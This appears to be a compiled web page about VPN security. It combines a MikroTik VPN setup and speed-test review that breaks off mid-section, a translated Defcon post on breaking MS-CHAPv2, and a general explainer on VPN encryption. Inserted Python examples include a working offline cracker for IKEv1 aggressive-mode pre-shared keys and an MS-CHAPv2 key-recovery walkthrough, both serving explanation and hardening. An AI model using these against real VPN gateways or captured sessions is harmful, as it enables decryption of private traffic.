Can a VPN be hacked? Detailed overview. How VPN encryption works

A review article on the use of modern private tunnels in routers of a popular Latvian brand. I will describe how to set up a VPN server on MikroTik using L2TP, IPsec, OpenVPN, PPTP, GRE and EoIP. Along the way I will briefly explain what these technologies are and how they differ, and compare the performance of the MikroTik with each of these tunnels.

This article is part of a series of articles about.

Introduction

I want to point out right away that this article is more an overview than a transfer of real experience, since I myself most often use ... as a VPN server. Nevertheless, I have also had to deal with VPN on MikroTik: a PPTP server for connecting remote clients, and L2TP for joining two or more MikroTiks into a common private network, mostly with default settings and without going into the finer details.

For those who want to understand networks properly but for some reason have not got there yet, I recommend the series of articles "Networks for the little ones".

VPN server options on MikroTik

With VPN server options on MikroTik, everything is complicated :) in the sense that there are many VPN implementations, and choosing between them is not easy unless you understand network technologies in detail. I am not an expert in them, but I think I get the gist. I will try to explain in my own words what the differences are.

There are two fundamentally different ways to organize connections between two MikroTiks and external subscribers:

  1. An L2 site-to-site tunnel with EoIP. The simplest and quickest way to join two MikroTiks; without encryption it gives the fastest VPN connections. Both devices need dedicated public ("white") IP addresses. Such connections are used to join offices or branches. In general they do not work through NAT. I will also put GRE here: although it works at L3 and uses routing, it is used site-to-site in the same way.
  2. Client-server VPN connections at L3, such as PPTP, L2TP, SSTP and OpenVPN. These are used both for joining offices and for connecting remote employees. A single public IP address on the server side is enough. They work through NAT.

A little more about each type of VPN connection separately.

  • GRE Tunnel uses the plain GRE protocol to build a basic, unencrypted site-to-site VPN. Developed by Cisco. It lets you encapsulate packets of various types inside IP tunnels: it takes your data with all its headers, packs it into a packet and sends it over the Internet to the other end, where the packet is unpacked back into the original data. To the end users it looks as if they are communicating over a local network.
  • EoIP Tunnel (Ethernet over IP) is a proprietary MikroTik RouterOS protocol that creates an Ethernet tunnel between two routers over an IP connection. It uses GRE for transport. The fundamental difference from GRE is that EoIP works at L2 and carries Ethernet frames directly, while a GRE tunnel carries packets and relies on routing. Why MikroTik decided to create its own tunnel on top of GRE, I do not know; perhaps there was simply no comparable solution, so they came up with their own.
  • PPTP stands for Point-to-Point Tunneling Protocol. It uses GRE for transport and supports encryption (MPPE). At one time PPTP was very popular because Windows supported it out of the box from version 95 onwards. Today PPTP is not recommended, as it is very easy to break: the encryption key can be recovered from a traffic dump within a short time (hours), after which all of the traffic is decrypted. This is not something a different cipher setting can fix, because the weakness lies in the MS-CHAPv2 authentication from which the MPPE keys are derived. For myself I decided that PPTP can be used as the simplest solution where there are no elevated security requirements and where decryption of the traffic, should it happen, would cause no problems. PPTP is supported out of the box not only by Windows but also by Android, which is very convenient. It is very easy to set up.
  • L2TP stands for Layer 2 Tunneling Protocol. Despite the "Layer 2" in the name, on an IP network it runs over UDP port 1701, so from the routing point of view it is an L3 tunnel. It can also run over networks other than IP. Like PPTP it supports user authentication out of the box. By itself it provides no encryption; for that it is combined with IPsec, which is considered very secure and has no known serious weaknesses, provided the pre-shared key is strong (a PSK can be attacked offline with a dictionary, as discussed further down). Today it is supported out of the box by almost all devices and systems, just like PPTP, and setting it up is not much harder. In general I recommend this type of encrypted tunnel for building a VPN.
  • OpenVPN is a very popular implementation of encrypted connections. Its main advantage is configuration flexibility; for example, a very convenient feature is pushing routes to the client on connect. I have been running OpenVPN servers for a long time. When I first needed to pass a route to a PPTP client I could not work out how to configure it; it turned out the protocol simply cannot do it, and I had to use third-party tools. Unfortunately, for some reason OpenVPN on MikroTik (at the time of writing) does not support UDP, which greatly narrows its usefulness: over TCP it is much slower than over UDP. Compression does not work either. So in general there is no point in running an OpenVPN server on MikroTik unless you need it for some specific reason.
  • SSTP (Secure Socket Tunneling Protocol) was introduced by Microsoft in Windows Vista SP1. Its main advantages are that it is built into Windows and runs over SSL/TLS on TCP port 443, which sometimes helps to get through firewalls. It is considered very secure. On the minus side, as far as I know, on MikroTik it is very demanding on the CPU: on weak hardware it gives the lowest speed of all the VPN types. For this reason I will not consider it in this review.

From all of the above, the conclusion is that in general it is best to use L2TP + IPsec on MikroTik. Main reasons:

  1. Simplicity and ease of customization.
  2. Strong encryption.
  3. Support for l2tp connections by almost all modern devices and systems. There is no need to install additional software.
  4. Suitable for both combining offices and remote employees - site-to-site and client-to-site connections.

If you need maximum performance without encryption, build the connections between networks or offices with EoIP, MikroTik's own development.

Let's start configuring and testing VPN connections on MikroTik.

Configuring an L2TP tunnel on MikroTik

First, let's set up a simple L2TP tunnel without encryption and measure its speed. To configure L2TP on MikroTik, follow these steps.

Go to IP -> Pool and add a pool of IP addresses for the VPN tunnel.

Create a profile for the tunnel in PPP -> Profiles.

The other tabs keep their default settings. Next, create a user in PPP -> Secrets.

Now start the L2TP server: go to PPP and press the L2TP Server button.

Set the L2TP server parameters; do not enable IPsec yet.

The VPN server is configured. Now create a persistent interface for it so that static routes can be built on it: go to Interfaces and create an L2TP Server Binding.

The finishing touch: create a static route so that hosts on the server's local network can reach hosts on the local network behind the remote router through the VPN. Go to IP -> Routes and add the route.

On the remote router, add a static route so that its clients know how to reach the other local network through the VPN.

That's all. L2TP is configured on the remote MikroTik, and the two local networks are joined through the VPN. While the L2TP connection is up, the IP address lists on the server and on the client should show addresses from the range specified on the server for the VPN network, 10.10.5.1-10.10.5.100. Now you can ping the opposite network from both sides.

For the test I have laptops connected to both MikroTiks. I measure the connection speed with iperf3: on the laptop 10.30.1.254 behind the router m-remote I start the server, and on 10.20.1.3 the client. Start the test:

Average speed: 194 Mbps. Frankly, I did not understand why the speed is so low. My test bench is two MikroTik routers with a gigabit MikroTik switch between them; I expected something around 500 Mbps. Remember that the tunnel is not encrypted yet. At the same time the CPU load on the routers was around 90-95%, so this is in fact the ceiling of this hardware.

Now let's enable IPsec encryption and measure the speed with it.

Configuring IPsec

With the IPsec setup for L2TP I got stuck for a while. There are many instructions on the net, but they are all outdated. As it turned out, in recent firmware versions enabling IPsec with the default settings is not just easy but very easy: in the L2TP server properties set Use IPsec to yes and enter a pre-shared key.

All the required IPsec settings are generated automatically. On the client do the same: enable IPsec and enter the same pre-shared key.

After the L2TP client connects, you will see lines like these in the log:

19:17:00 l2tp,ppp,info l2tp-out1: initializing...
19:17:00 l2tp,ppp,info l2tp-out1: connecting...
19:17:03 ipsec,info initiate new phase 1 (Identity Protection): 192.168.13.197<=>192.168.13.1
19:17:04 ipsec,info ISAKMP-SA established 192.168.13.197-192.168.13.1 spi:407844c0ceb5d2ab:46ce7ffb25495efd
19:17:07 l2tp,ppp,info l2tp-out1: authenticated
19:17:07 l2tp,ppp,info l2tp-out1: connected

To make sure IPsec encryption is working, go to IP -> IPsec -> Installed SAs and look at the encrypted packet counter. If it grows, everything is in order: the traffic is encrypted.

In the same place, under Remote Peers, you can see the list of remote peers for which IPsec is active and the algorithms in use. All the default IPsec settings live in this section; you can view them, change them or add new profiles. By default SHA-1 is used for integrity and AES for encryption. You can change these if you know the topic; if you do, prefer SHA-256 over SHA-1 and AES-256, and make sure weak options such as 3DES and MD5 are not left in the proposal. I did not dig into which algorithms are the fastest, so I left the defaults.

Let's test the speed of the L2TP + IPsec connection.

I got 26 Mbps on average, with the CPU at 100%. Not much. This hardware is poorly suited to encrypted channels. In these tests nothing else loads the routers; in real conditions the speed will be even lower.

That is it for the L2TP + IPsec VPN. Let's continue with the rest of the tunnels and compare their speed.

Configuring a PPTP server on MikroTik

Setting up a PPTP server does not differ fundamentally from L2TP; the logic and the sequence of steps are the same. First, create a pool of addresses for the VPN network in IP -> Pool. I use the same pool created earlier.

Next, create a profile in PPP -> Profiles. It keeps the default encryption setting, which is off; let's first check the speed of the VPN channel without encryption. Then create a new user for the remote PPTP connection.

Enable the PPTP server in the PPP section.

Now create a PPTP Server Binding in the Interface list, by analogy with the previous section.

And finally, add a static route to the remote network through the PPTP connection.

The PPTP server setup is complete. On the firewall you need to allow the following for incoming connections on the external interface:

  • TCP port 1723
  • GRE protocol

Now let's configure the PPTP client.

PPTP client

Go to the remote router and set up the connection with the PPTP client there: in the PPP section add a PPTP Client. On the General tab leave everything as it is; on Dial Out enter the address of the PPTP server and the user credentials for the connection.

Add a static route to the remote office through the VPN tunnel.

All is ready. Activate the PPTP connection and try to ping addresses in the remote local network. In the PPTP connection status on the client you can confirm that encryption is disabled.

Now let's check the speed of the VPN connection over PPTP.

The same 194 Mbps as on unencrypted L2TP, at 100% CPU load. It was a little strange to see exactly the same numbers; I ran the tests several times, but the result was consistently the same. Without encryption there is no speed difference between L2TP and PPTP.

Now let's enable encryption in PPTP on the server and look at the speed. To do this, explicitly require encryption in the PPTP profile: go to PPP -> Profiles and edit the profile.

Check in the client's connection status that encryption is on.

Testing the speed of the PPTP connection with encryption enabled.

It came to 71 Mbps on average. Not bad compared with IPsec in L2TP. As I said earlier, the PPTP server is suitable where encryption is either not needed at all or where it is acceptable that the traffic may be decrypted. It is still covered by encryption, so a casual passer-by will not see anything directly; at the very least an attacker has to capture the traffic and then recover the key. In PPTP's case the key is derived from the MS-CHAPv2 handshake, which can be broken from a capture in bounded time (see the MS-CHAPv2 section below), so this should not be counted on as a strong protection.
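The settings discussed in the L2TP and PPTP sections above can be checked automatically from a router's /export dump. The script below is an added example written for this page, not code from the article or from MikroTik. The export snippet inside it is constructed (it follows the real export layout: a section path line followed by set/add lines with key=value pairs, long lines continued with a trailing backslash), and the findings restate the article's own conclusions (PPTP is breakable, L2TP without IPsec is cleartext, PPP encryption can be switched off) plus two checks the article does not make: a Blowfish OpenVPN cipher and 3DES/MD5 left in the IPsec proposal.

```python
"""Audit a RouterOS /export dump for the weak VPN settings discussed above.

Added example; not code from the original article or from MikroTik. The
export text below is constructed for the demo and mirrors the real format.
"""
import shlex

SAMPLE_EXPORT = """\
# constructed sample, not a real router
/ip pool
add name=vpn-pool ranges=10.10.5.1-10.10.5.100
/ppp profile
add name=l2tp-profile local-address=10.10.5.1 remote-address=vpn-pool \\
    use-encryption=no
add name=pptp-profile local-address=10.10.5.1 remote-address=vpn-pool \\
    use-encryption=required
/interface l2tp-server server
set default-profile=l2tp-profile enabled=yes use-ipsec=no
/interface pptp-server server
set default-profile=pptp-profile enabled=yes
/interface ovpn-server server
set certificate=ovpnserver cipher=blowfish128 enabled=yes
/ip ipsec proposal
set [ find default=yes ] auth-algorithms=sha1 enc-algorithms=aes-256-cbc,3des
"""

WEAK_IPSEC = {"des", "3des", "md5", "null"}


def logical_lines(text):
    """Join RouterOS continuation lines (trailing backslash) into one logical line."""
    buf = ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        yield buf + line
        buf = ""


def parse_export(text):
    """Yield (section, command, {key: value}) for every set/add line in the export."""
    section = None
    for line in logical_lines(text):
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):          # a new menu path, e.g. "/interface l2tp-server server"
            section = line
            continue
        tokens = shlex.split(line)        # handles quoted values such as name="remote user"
        params = {}
        for tok in tokens[1:]:
            key, sep, value = tok.partition("=")
            if sep and key:
                params[key] = value
        yield section, tokens[0], params


def audit(text):
    """Return one finding string per weak setting; an empty list means nothing was flagged."""
    findings = []
    for section, cmd, p in parse_export(text):
        if section == "/interface pptp-server server" and p.get("enabled") == "yes":
            findings.append("PPTP server enabled: MS-CHAPv2/MPPE keys are recoverable from a capture, treat as cleartext")
        if section == "/interface l2tp-server server" and p.get("enabled") == "yes" and p.get("use-ipsec", "no") == "no":
            findings.append("L2TP server without IPsec: the PPP payload crosses the Internet unencrypted")
        if section == "/ppp profile" and p.get("use-encryption") == "no":
            findings.append(f"PPP profile {p.get('name')} has use-encryption=no (matters for PPTP, harmless under L2TP/IPsec)")
        if section == "/interface ovpn-server server" and p.get("enabled") == "yes" and p.get("cipher", "").startswith("blowfish"):
            findings.append("OpenVPN server cipher is Blowfish (64-bit block); use an AES cipher")
        if section == "/ip ipsec proposal":
            algs = set(p.get("auth-algorithms", "").split(",")) | set(p.get("enc-algorithms", "").split(","))
            weak = sorted(algs & WEAK_IPSEC)
            if weak:
                findings.append(f"IPsec proposal allows weak algorithms: {', '.join(weak)}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_EXPORT):
        print("-", finding)
```

Run it against the output of `/export` saved from the router; a clean result is an empty list. The PPP-profile check is deliberately soft, because under L2TP/IPsec the PPP-level MPPE setting does not matter, while under PPTP it is the only encryption there is.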

Let's move on to the OpenVPN server on MikroTik. It is very interesting to see the speed tests for this type of VPN connection.

Configuring an OpenVPN server on MikroTik

There is nothing complicated in setting up an OpenVPN server on MikroTik, except for the nuance with certificates, which may seem confusing to someone who has never worked with them. In addition, at the time of writing RouterOS itself offered no convenient way to create server and client certificates, so third-party utilities are used here (newer RouterOS versions can generate and sign certificates themselves under System -> Certificates). If you have a Linux machine, you can use my instructions for.

If you have no Linux machine but still want to build the OpenVPN tunnel on MikroTik, let's go through the configuration. First we need the OpenVPN distribution for Windows; download it from https://openvpn.net/community-downloads/. We need the Windows Installer.

Run the installation as administrator and during the installation select the component called EasyRSA 2 Certificate Management Scripts.

Go to the directory C:\Program Files\OpenVPN. Move the easy-rsa folder from there somewhere else, so that you do not constantly stumble over UAC, which will not let you work quietly inside Program Files. I moved it to D:\tmp\easy-rsa. Rename the file vars.bat.sample to vars.bat, open it for editing and bring it to something like the following.

For those who do not know: these are just variables set for my needs. Anything can be written there; it is not essential for our task, and you can leave it as it is. Create a keys folder in that directory. Next, open a command prompt as administrator, change to D:\tmp\easy-rsa and run vars, clean-all and build-ca.

Answer the questions to finish creating the root certificate; it appears in D:\tmp\easy-rsa\keys. Next, create a certificate for the OpenVPN server with the command build-key-server servername.

Now generate a certificate for the client. I have only one client, the remote MikroTik; create as many as you need, with the command build-key certificate_name.

That completes the certificates; they are all in the keys directory. Transfer the following files to the MikroTik that will act as the OpenVPN server:

  • ca.crt
  • ovpnserver.crt
  • ovpnserver.key

Import the certificates from the uploaded files: go to System -> Certificates and import ca.crt first, then ovpnserver.crt and ovpnserver.key.

It should look something like this. Now let's set up the OpenVPN server on MikroTik. Create a separate profile for it in PPP -> Profiles.

All settings are default. As the local and remote address I use the IP pool created at the very beginning, for L2TP. Add a remote user for OpenVPN in PPP -> Secrets.

Go to PPP and click OVPN Server. Specify the settings and the imported server certificate (ovpnserver, the one that has the private key).

This completes the OpenVPN server configuration. By default the cipher is BF-128-CBC (Blowfish). It can be changed in the client's properties, and the list of allowed ciphers in the server's properties. Blowfish has a 64-bit block, so it is better to select an AES cipher.

For this OpenVPN server setup to work, open incoming TCP port 1194 on the firewall. Now let's set up the OpenVPN client and test the connection speed over OpenVPN.

OpenVPN client

To configure the OpenVPN client on MikroTik, transfer the certificates generated in the previous step, specifically these files:

  • m-remote.crt
  • m-remote.key

Import the certificate from these files, as on the server. Note that the certificate must show the flags K and T next to its name (private key present, trusted).

Now configure the OpenVPN client: go to PPP and add an OVPN Client.

Add a static route to reach the resources of the remote network behind the OpenVPN server.

All is ready. Connect and test the speed of the VPN connection over OpenVPN.

I got 24 Mbps on average at 100% CPU load, comparable to L2TP + IPsec. I was a little surprised by the result: I thought it would be worse than L2TP, but in reality it is the same. Personally I like the OpenVPN option more, although with the limited OpenVPN settings on MikroTik its advantages are hard to realise. Remember that I tested with BF-128-CBC, i.e. Blowfish.

With AES-128-CBC the result was 23 Mbps, about the same.

That covers the client-server VPN servers on MikroTik. Now let's look at the speed of an L2 VPN in the form of an EoIP tunnel.

EoIP Tunnel + IPsec setup

Let's build a VPN based on EoIP on MikroTik. Here you need to understand an important difference from everything configured before: the EoIP tunnel works at L2, so both network segments see themselves as one physical network, with one address space for both (in my example 10.20.1.0/24). There should be only one DHCP server for both networks; in my case it stays on m-server.

Create the EoIP tunnel on m-server: go to Interface list -> EoIP Tunnel and add a new one.

Of the settings, it is enough to specify only the remote address of the second MikroTik. The new EoIP interface must be added to the local bridge along with the physical interfaces.

Go to the remote MikroTik and do the same there, only with the other Remote Address.

This is enough for the EoIP tunnel to come up immediately; its flags will show RS (running, slave).

On the second MikroTik the EoIP interface must also be added to the local bridge with the other interfaces.

The easiest check is to run a DHCP client on the bridge interface of m-slave: it should get an IP address from the DHCP server on m-server, provided there are no other DHCP servers on the network. The same happens with the local machines behind m-slave: they receive addresses from the DHCP server on m-server.

Now let's check the performance of this EoIP-based VPN tunnel.

The best result I got was 836 Mbps. For some reason the speed floated between 600 and 850 Mbps across tests; to make it change I had to disable and re-enable the EoIP interface. The speed is impressive, and the CPU is not at 100%, so it is not the bottleneck; it looks as if I hit the limits of the network itself. Remember that there is no encryption and no routing here: a direct L2 channel between two MikroTiks over EoIP.

Let's add IPsec encryption to the EoIP tunnel and look at the speed. To do this, change the tunnel settings on both MikroTiks: add the IPsec secret and the local addresses, and disable Fast Path.


Divide and Conquer: Guaranteed MS-CHAPv2 Hack

Alexander Antipov

At the twentieth Defcon conference, David Hulton and I gave a talk on breaking MS-CHAPv2. This post gives a rough overview of what we covered.



Why MS-CHAPv2?

The first obvious question is why we went after MS-CHAPv2, given the long-standing feeling that the Internet should not rely on this protocol. Unfortunately, even as an outdated protocol and the subject of widespread criticism, it continues to be used everywhere. Most notable is its use in PPTP VPNs. It is also used quite heavily in WPA2 Enterprise configurations, especially where its mutual-authentication properties are relied upon. For our talk we compiled a list of hundreds of VPN providers that depend on PPTP, including notable examples such as iPredator, The Pirate Bay's VPN, which is supposedly designed to protect communications from government surveillance.

We believe MS-CHAPv2 remains so prevalent because previous investigations of the protocol's weaknesses focused mainly on dictionary attacks. Combine that limited view with the extremely wide range of clients and operating systems that support the protocol out of the box, and it becomes clear why the solution that demands the least effort from the user is so tempting.
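To see why the title says "guaranteed" rather than "dictionary", it helps to look at how the MS-CHAPv2 response is derived. The following is an added example written for this page, not the chapcrack tool from the talk: it implements the key-derivation side of RFC 2759 in Python (ChallengeHash and the 7-to-8-byte DES key expansion) and leaves the DES encryptions themselves out, because the structure alone shows the problem. The NT hash, challenges and user name are constructed values.

```python
"""Where the MS-CHAPv2 response comes from, and why "divide and conquer" works.

Added example, not the chapcrack code from the talk. Only the key side of
RFC 2759 is implemented; the DES encryptions are not needed to see the point.
"""
import hashlib


def challenge_hash(peer_challenge: bytes, authenticator_challenge: bytes, username: bytes) -> bytes:
    """RFC 2759 ChallengeHash(): first 8 bytes of SHA1(PeerChallenge | AuthenticatorChallenge | UserName).
    All three inputs travel in the clear, so the attacker knows the DES plaintext."""
    if len(peer_challenge) != 16 or len(authenticator_challenge) != 16:
        raise ValueError("challenges are 16 bytes each")
    return hashlib.sha1(peer_challenge + authenticator_challenge + username).digest()[:8]


def des_key_from_7_bytes(k7: bytes) -> bytes:
    """Expand 7 bytes (56 bits) into an 8-byte DES key: 7 key bits per byte plus an odd-parity bit."""
    if len(k7) != 7:
        raise ValueError("need exactly 7 bytes")
    bits = int.from_bytes(k7, "big")
    out = bytearray()
    for i in range(8):
        seven = (bits >> (49 - 7 * i)) & 0x7F            # next 7 bits, most significant first
        parity = 0 if bin(seven).count("1") % 2 else 1   # make the byte's popcount odd
        out.append((seven << 1) | parity)
    return bytes(out)


def response_des_keys(nt_hash: bytes):
    """The 16-byte NT hash (MD4 of the UTF-16LE password) is zero-padded to 21 bytes and cut
    into three 7-byte DES keys. The 24-byte NT-Response on the wire is
    DES(K1, CH) | DES(K2, CH) | DES(K3, CH), with CH = challenge_hash(...)."""
    if len(nt_hash) != 16:
        raise ValueError("NT hash is 16 bytes")
    padded = nt_hash + b"\x00" * 5
    return tuple(des_key_from_7_bytes(padded[i:i + 7]) for i in (0, 7, 14))


def k3_candidates():
    """Every possible third key. Only NTHash[14:16] is unknown; the other five key bytes are
    the zero padding, so there are just 2**16 candidates to test against the third response block."""
    return {des_key_from_7_bytes(bytes([a, b]) + b"\x00" * 5) for a in range(256) for b in range(256)}


def work_factor():
    """Trial encryptions the attacker needs. K1 and K2 encrypt the same CH, so one pass over all
    2**56 single-DES keys tests both at once; K3 costs 2**16. The effective strength is single DES,
    not the 2**128 NT-hash space, and the search always finishes: no dictionary is involved."""
    return {"k3": 2 ** 16, "k1_k2_in_one_pass": 2 ** 56, "naive_nt_hash": 2 ** 128}


if __name__ == "__main__":
    nt_hash = bytes(range(16))                               # constructed, not a real hash
    ch = challenge_hash(b"P" * 16, b"A" * 16, b"alice")      # constructed challenges and user
    k1, k2, k3 = response_des_keys(nt_hash)
    print("ChallengeHash:", ch.hex())
    print("K1, K2, K3   :", k1.hex(), k2.hex(), k3.hex())
    print("K3 tail is parity-only zeros:", k3[3:] == b"\x01" * 5)
    print("work factor  :", work_factor())
```

Once K3 has given up NTHash[14:16] (a few thousand DES operations), the remaining 2**56 search recovers the full NT hash, which is itself enough to derive the MPPE session keys and decrypt the captured PPTP session; the password never has to be guessed.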

Now what?

1) All users and providers of PPTP VPN solutions should immediately start migrating to another VPN protocol. PPTP traffic should be considered unencrypted.

2) Companies that rely on MS-CHAPv2 mutual authentication properties to connect to their WPA2 RADIUS servers should start migrating to an alternative solution immediately.

In many cases large companies have chosen IPsec with pre-shared keys (IPSEC-PSK) over PPTP. While PPTP is now clearly broken, IPSEC-PSK is probably even more vulnerable to a dictionary attack than PPTP ever was: PPTP at least requires an attacker to capture an active session before running an offline dictionary attack, whereas an IPsec PSK VPN in aggressive mode essentially hands a hash to any attacker who connects.

Given the solutions available today, deploying anything securely needs some form of certificate validation: either an OpenVPN configuration, or IPsec in certificate mode instead of PSK.
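The aggressive-mode point above, worked as an added example (Python, not code from the original post). It models RFC 2409 with HMAC-SHA1 as the prf: SKEYID = prf(PSK, Ni | Nr) and HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b). In aggressive mode the responder sends HASH_R in message 2, unencrypted, together with Nr, g^xr and IDir, and the initiator chose Ni, g^xi, CKY-I and SAi itself; so an attacker who merely starts an exchange holds every input except the PSK. The capture values, the gateway identity vpn.example.com and the word list are constructed.

```python
"""Offline dictionary attack on an IKEv1 aggressive-mode pre-shared key.

Added example, not from the original post. Every value here is constructed;
fixed bytes stand in for the nonces, DH public values and cookies.
"""
import hashlib
import hmac


def prf(key: bytes, data: bytes) -> bytes:
    """The negotiated prf; HMAC-SHA1 is assumed for this example."""
    return hmac.new(key, data, hashlib.sha1).digest()


def skeyid_psk(psk: bytes, ni: bytes, nr: bytes) -> bytes:
    """RFC 2409 section 5.4: SKEYID for pre-shared-key authentication."""
    return prf(psk, ni + nr)


def hash_r(psk: bytes, ex: dict) -> bytes:
    """The responder's authentication hash, computed the way the gateway computes it."""
    data = ex["gxr"] + ex["gxi"] + ex["cky_r"] + ex["cky_i"] + ex["sai_b"] + ex["idir_b"]
    return prf(skeyid_psk(psk, ex["ni"], ex["nr"]), data)


def constructed_capture(gateway_psk: str) -> dict:
    """What an attacker holds after sending aggressive-mode message 1 and receiving message 2."""
    ex = {
        "cky_i": bytes.fromhex("a1a2a3a4a5a6a7a8"),              # chosen by the attacker
        "cky_r": bytes.fromhex("b1b2b3b4b5b6b7b8"),              # from the reply header
        "ni": hashlib.sha256(b"initiator nonce").digest(),       # chosen by the attacker
        "nr": hashlib.sha256(b"responder nonce").digest(),       # sent in the clear in message 2
        "gxi": hashlib.sha512(b"g^xi placeholder").digest(),     # attacker's KE payload
        "gxr": hashlib.sha512(b"g^xr placeholder").digest(),     # gateway's KE payload, in the clear
        "sai_b": hashlib.sha256(b"SAi payload body").digest(),   # attacker's own proposal
        "idir_b": bytes([2, 0, 0, 0]) + b"vpn.example.com",      # ID payload body, type FQDN, in the clear
    }
    ex["hash_r"] = hash_r(gateway_psk.encode(), ex)              # the gateway's message-2 HASH_R
    return ex


def crack_psk(capture: dict, wordlist):
    """Offline: recompute HASH_R under each candidate PSK and compare with the captured one."""
    target = capture["hash_r"]
    for candidate in wordlist:
        if hmac.compare_digest(hash_r(candidate.encode(), capture), target):
            return candidate
    return None


WORDLIST = ["password", "123456", "vpnvpn", "cisco123", "Summer2019!", "letmein"]

if __name__ == "__main__":
    print("weak PSK recovered :", crack_psk(constructed_capture("cisco123"), WORDLIST))
    print("strong PSK         :", crack_psk(constructed_capture("4Vq8!zL2#pW9rT1u"), WORDLIST))
```

Nothing in the loop touches the network, which is the point: one initiated exchange yields a hash that can be attacked for as long as the attacker likes (ike-scan with psk-crack automates exactly this). In main mode HASH_R is sent encrypted after the Diffie-Hellman exchange, which is why the paragraph above singles out aggressive mode; a certificate-based IKE configuration removes the guessable secret altogether.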

A virtual private network (VPN) creates a secure virtual tunnel over the Internet from one device to another. If you access the network through such a tunnel, it becomes very difficult for anyone else, your provider included, to track what you do.

VPN services also let you appear to be in a different physical location, which gives access to services that are blocked for users from certain regions. Using a VPN protects the confidentiality (data remains secret) and the integrity (data remains unchanged) of the messages sent over the network.

Connecting to a VPN is straightforward. The user goes online through their provider, then establishes a VPN connection to the VPN server using a client (a program installed on the user's computer). The VPN service then fetches the pages the user requests and delivers them through the secure tunnel. Note that the tunnel protects only the path between the user and the VPN server; between the VPN server and the destination, the traffic is exactly as protected as the destination protocol (HTTPS, for example) makes it.

How does VPN encryption work?

A VPN protocol is a set of rules for transmitting and encrypting data. Most VPN services offer several protocols to choose from, the most common being Point-to-Point Tunnelling Protocol (PPTP), Layer Two Tunnelling Protocol (L2TP, combined with IPsec), Internet Protocol Security (IPsec) and OpenVPN (SSL/TLS).

There is no way to explain how VPNs protect privacy without talking about encryption. Encryption turns readable data (plaintext) into something unreadable (ciphertext) for anyone who intercepts it. The algorithm (cipher) determines how encryption and decryption are carried out within a given VPN protocol, and the protocol uses it to keep your data confidential.

Each protocol has its strengths and weaknesses depending on the cryptographic algorithms it uses, and some services let users pick a cipher themselves. Three kinds of primitives are involved: symmetric ciphers, asymmetric (public-key) algorithms and hash functions (the last are not ciphers at all, but one-way functions).

Symmetric encryption uses the same key for encryption and decryption. Asymmetric encryption uses a key pair: what one key encrypts, only the other can decrypt. The table below compares the two.

Parameter          | Symmetric encryption                                  | Asymmetric encryption
-------------------+-------------------------------------------------------+--------------------------------------------------------------
Keys               | One shared key used by all parties                    | Each party has a key pair: a public key and a private key
Key exchange       | Needs a secure channel to deliver the key             | Private key stays with its owner; public key can be published
Speed              | Simple and fast                                       | More computation, much slower
Strength           | Depends on the cipher and key length, not on the type | Depends on key length and the underlying hard problem
Scalability        | Poor: every pair of parties needs its own key         | Good: one key pair per party
Usage              | Bulk data encryption                                  | Key exchange and digital signatures
Security services  | Confidentiality                                       | Confidentiality, authentication, non-repudiation
Examples           | DES, Triple DES, AES, Blowfish, IDEA, RC4, RC5, RC6   | RSA, ECC, DSA, Diffie-Hellman
                   | (DES and RC4 are broken and should not be used)       |

Asymmetric cryptography comes to the rescue where symmetric cryptography hits its limits (key distribution, as the table shows). Whitfield Diffie and Martin Hellman published the first public description of public-key cryptography in 1976, including the key-agreement method now known as the Diffie-Hellman algorithm.

It is a widely used algorithm that underlies many secure protocols, including TLS (HTTPS), SSH, IPsec (IKE) and OpenVPN. With it, two parties who have never met can agree on a shared secret key even when they communicate over an insecure public network such as the Internet, because an eavesdropper who sees only the exchanged public values cannot compute the secret.

Hashing is a one-way (irreversible) function used to protect the integrity of transmitted data; it is not encryption, since nothing can be recovered from a hash. Many VPN protocols use hash functions, usually in keyed form (HMAC), to authenticate the messages sent over the VPN. Examples include MD5, SHA-1 and SHA-2; MD5 and SHA-1 are no longer considered secure for new designs.

VPN services can be attacked, but breaking a correctly configured one is very hard. Without a VPN at all, your exposure is much greater.

Can someone hack the VPN service?

VPN services remain one of the most reliable ways to protect online privacy. Still, anything can be broken, especially if you are a valuable target and your adversaries have enough capability, time and money. Fortunately, most ordinary VPN users are not such targets and are unlikely to attract that much attention.

To break a VPN connection you have to defeat its encryption, and for that you must either exploit a weakness in the implementation or the algorithm, or obtain the key in some other way. Cryptanalysis aims to recover plaintext from ciphertext without the key; for modern ciphers with adequate key sizes this takes far more computation and time than is practical, literally years or more.

Stealing the key is attempted far more often, and understandably so: it is much easier than breaking the cipher, and it is the first thing attackers go for. It depends not on mathematics alone but on a combination of technical tricks, computing power, deception, court orders and backdoors, bribery and other dirty methods. All of this because breaking the cipher itself is a very hard and resource-intensive task.

Known VPN vulnerabilities

Edward Snowden and computer-security specialists have claimed more than once that the NSA (US National Security Agency) has broken the encryption that protects much of Internet traffic, VPN traffic included. According to the Snowden documents, the NSA decrypts VPN traffic by collecting the encrypted traffic and passing it to powerful computers, which return the key.

Computer-security researchers J. Alex Halderman and Nadia Heninger presented a compelling analysis showing that the NSA could indeed decrypt large volumes of HTTPS, SSH and VPN traffic using the Logjam attack against common uses of Diffie-Hellman.

The NSA's success would rest on a weakness in how Diffie-Hellman is deployed: most implementations use a small set of standardized primes. Halderman and Heninger argue that for a few hundred million US dollars a machine could be built that completes the precomputation for a single 1024-bit prime in about a year; after that, individual connections that use that prime can be broken quickly. Against the NSA's annual budget, this is not out of reach.

Unfortunately, only a handful of such primes (1024 bits or shorter) are in common use in everyday encrypted applications, VPNs included, so the precomputation for one prime pays off across an enormous number of connections. As Bruce Schneier put it, the math is good; the code that implements it is another matter.

Should you keep using VPNs?

Halderman and Heninger advise VPN operators to move to 2048-bit or larger Diffie-Hellman groups, and they published a guide on deploying them with TLS. The Internet Engineering Task Force (IETF) likewise recommends newer protocol versions that mandate larger primes.

Hackers can break Diffie-Hellman keys of 1024 bits or less (approximately 309 decimal digits). Cracking 2048-bit keys will be a real problem for them! In other words, they will not be able to decrypt data protected by such keys for a very long time.

As for users, it should be noted that hackers do know about the vulnerabilities of VPN services and encryption protocols, and they use them to steal and gain access to encrypted data. However, you are much better protected with a VPN than without one. Your computer can be hacked, but it will be very expensive and time consuming. And yes, the less visible you are, the better protected you are.

